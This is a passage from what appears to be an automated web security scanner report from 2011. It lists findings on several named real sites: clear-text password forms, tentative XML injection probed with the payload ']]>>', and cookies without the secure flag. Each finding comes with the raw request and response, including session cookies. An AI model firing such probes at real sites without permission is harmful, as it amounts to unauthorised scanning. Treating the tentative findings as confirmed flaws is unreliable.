<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<br />
   <form method="post" action="./ucp.php?mode=login">
   <table width="100%" border="0" cellpadding="0" cellspacing="0">
...[SNIP]...
</span> <input class="post" type="password" name="password" size="10" />&nbsp; <span class="gensmall">
...[SNIP]...

6.2. http://www.secviz.org/node/89  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.secviz.org
Path:   /node/89

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /node/89 HTTP/1.1
Host: www.secviz.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:56 GMT
Server: Apache/2.2.17
Set-Cookie: SESS511f69598f6d24673b9cd181bd44c360=3679a5a8e5f156807fb4105e9bf204df; expires=Sat, 04-Jun-2011 04:22:16 GMT; path=/; domain=.secviz.org
Last-Modified: Wed, 11 May 2011 22:47:09 GMT
ETag: "13ef58d2264914230329c15df5277159"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 17680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title>The D
...[SNIP]...
<div class="content">
<form action="/content/the-davix-live-cd?destination=node%2F89" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

7. XML injection  previous  next
There are 6 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


7.1. http://api.facebook.com/restserver.php [format parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F%22%5D&format=json]]>>&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Wed, 11 May 2011 17:53:11 -0700
Pragma:
X-FB-Rev: 377111
X-FB-Server: 10.42.16.39
X-Cnection: close
Date: Thu, 12 May 2011 00:51:11 GMT
Content-Length: 916

fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...

7.2. http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://images.smartname.com
Path:   /smartname/images/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smartname]]>>/images/favicon.ico HTTP/1.1
Host: images.smartname.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Cartoon: : aaimage1-new
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.20
Date: Thu, 12 May 2011 00:43:13 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

7.3. http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://images.smartname.com
Path:   /smartname/images/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smartname/images]]>>/favicon.ico HTTP/1.1
Host: images.smartname.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Cartoon: : aaimage1-new
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.20
Date: Thu, 12 May 2011 00:43:15 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

7.4. http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://images.smartname.com
Path:   /smartname/images/favicon.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smartname/images/favicon.ico]]>> HTTP/1.1
Host: images.smartname.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Cartoon: : aaimage1-new
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.20
Expires: Thu, 12 May 2011 00:43:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 00:43:16 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

7.5. http://mobilitypoint.westcon.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mobilitypoint.westcon.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
Host: mobilitypoint.westcon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:11:56 GMT
Server: Apache/2.2.8 (EL)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1029

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

7.6. http://www.nanpa.org/forums/external.php [type parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.nanpa.org
Path:   /forums/external.php

Issue detail

The type parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the type parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /forums/external.php?type=js]]>> HTTP/1.1
Host: www.nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/recent_forum_posts.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:10 GMT
Server: Apache
Set-Cookie: vblastvisit=1305158650; expires=Fri, 11-May-2012 00:04:10 GMT; path=/
Set-Cookie: vblastactivity=0; expires=Fri, 11-May-2012 00:04:10 GMT; path=/
Cache-Control: max-age=1305160149
Pragma: private
X-UA-Compatible: IE=7
Expires: Thu, 12 May 2011 00:29:09 GMT
Last-Modified: Wed, 11 May 2011 23:29:09 GMT
ETag: "5ad4bc554cc5b569cc359626e1477d12"
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/xml; charset=ISO-8859-1
Content-Length: 30699

<?xml version="1.0" encoding="ISO-8859-1"?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
   <channel>
       <title>NANPA - Natu
...[SNIP]...

8. SSL cookie without secure flag set  previous  next
There are 15 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


8.1. https://catalyst.fastcatalog.net/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://catalyst.fastcatalog.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: catalyst.fastcatalog.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.catalysttelecom.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AD971C52BCD76B2912D285BABD89388E; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:11:13 GMT
Connection: Keep-Alive
Content-Length: 6220


   <!-- -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type"
...[SNIP]...

8.2. https://lnp.activationnow.com/lnp/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://lnp.activationnow.com
Path:   /lnp/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lnp/ HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: LNP=pabetaptel16p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-cache="set-cookie"
Date: Thu, 12 May 2011 00:50:19 GMT
Location: https://lnp.activationnow.com/lnp/jsp/logon/login.jsp;jsessionid=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395
Set-Cookie: JSESSIONID=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 457

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://lnp.activationnow.com/lnp/j
...[SNIP]...

8.3. https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/911_logo_trc.jpg.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/911_logo_trc.jpg.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=E67566A9FCA34838BD3C0F39C7667AF5; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"23480-1288968421251"
Last-Modified: Fri, 05 Nov 2010 14:47:01 GMT
Content-Type: image/gif
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 23480

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

8.4. https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/Custom_HeadLogo.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/Custom_HeadLogo.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=278E65F15DE692F4A8E073513FF95433; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"4671-1288970193688"
Last-Modified: Fri, 05 Nov 2010 15:16:33 GMT
Content-Type: image/gif
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 4671

.PNG
.
...IHDR..............h.s...    pHYs..........+....
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

8.5. https://support.connexon.com/custom/customimages/portal-browse-solutions.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/portal-browse-solutions.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/portal-browse-solutions.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=8B4C97B2401F7908250BAE174F9BBA38; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"1990-1280994282000"
Last-Modified: Thu, 05 Aug 2010 07:44:42 GMT
Content-Type: image/gif
Content-Length: 1990
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1

GIF89a0.0....J..3i.w..,}.*j."[{......$VxN...Lky..c.....\..Z..*y....=r....V..2..i..Y..o..5........f..,..&i.......7..l..Q..3..:........$a.S..S........{..g..5..m........[..{........`.....9..4..e..*.."TsA
...[SNIP]...

8.6. https://support.connexon.com/custom/customimages/portal-browse-ticket.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/portal-browse-ticket.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/portal-browse-ticket.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=AD61B4917C0B442AD2D923ADADC2675A; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"2226-1280994282000"
Last-Modified: Thu, 05 Aug 2010 07:44:42 GMT
Content-Type: image/gif
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 2226

GIF89a0.0....w..m...........!4m...........W....y....6....w...........e..]M...f.F..BEu.........J.k...v.......T.........B...........jw............m.....e...........I........|8?r...8..`.t........Y.......
...[SNIP]...

8.7. https://support.connexon.com/images/favicon.ico  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /images/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/favicon.ico HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=607787AE9CA83B1C07389AEFC2EF256A; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:13 GMT; Path=/
ETag: W/"318-1282158794000"
Last-Modified: Wed, 18 Aug 2010 19:13:14 GMT
Content-Length: 318
Date: Thu, 12 May 2011 01:08:12 GMT
Server: Apache-Coyote/1.1

..............(.......(....... .................................................................................................................wwpwww....|.....................ww|.......|.............
...[SNIP]...

8.8. https://support.connexon.com/images/spacer.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/spacer.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=3E33D7090110A52AF1A2EDAFA1C24EAD; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:10 GMT; Path=/
Expires: Mon, 16 May 2011 05:08:10 GMT
ETag: W/"43-1282158794000"
Last-Modified: Wed, 18 Aug 2010 19:13:14 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 01:08:10 GMT
Server: Apache-Coyote/1.1

GIF89a.............!.......,...........D..;

8.9. https://support.connexon.com/sd/SolutionsHome.sd  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /sd/SolutionsHome.sd

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sd/SolutionsHome.sd HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.911enable.com/login/index.php

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=270247465902DF59F63589A1CC79528E; Path=/sd
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/sd; Expires=Fri, 13-May-2011 01:08:08 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 13742


<html>
<link type="text/css" rel="stylesheet" href="../style/style.css?aa">
<link type="text/css" rel="stylesheet" href="../style/demo.css">
<link rel="SHORTCUT ICON" hre
...[SNIP]...

8.10. https://support.connexon.com/style/demo.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /style/demo.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/demo.css HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 404 /style/demo.css
Set-Cookie: JSESSIONID=CF1B4E8028A2944A1E644EE9D78DB960; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
Expires: Mon, 16 May 2011 05:08:09 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 997
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1

<html><head><title>Apache Tomcat/5.0.28 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

8.11. https://support.connexon.com/style/style.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /style/style.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/style.css?aa HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
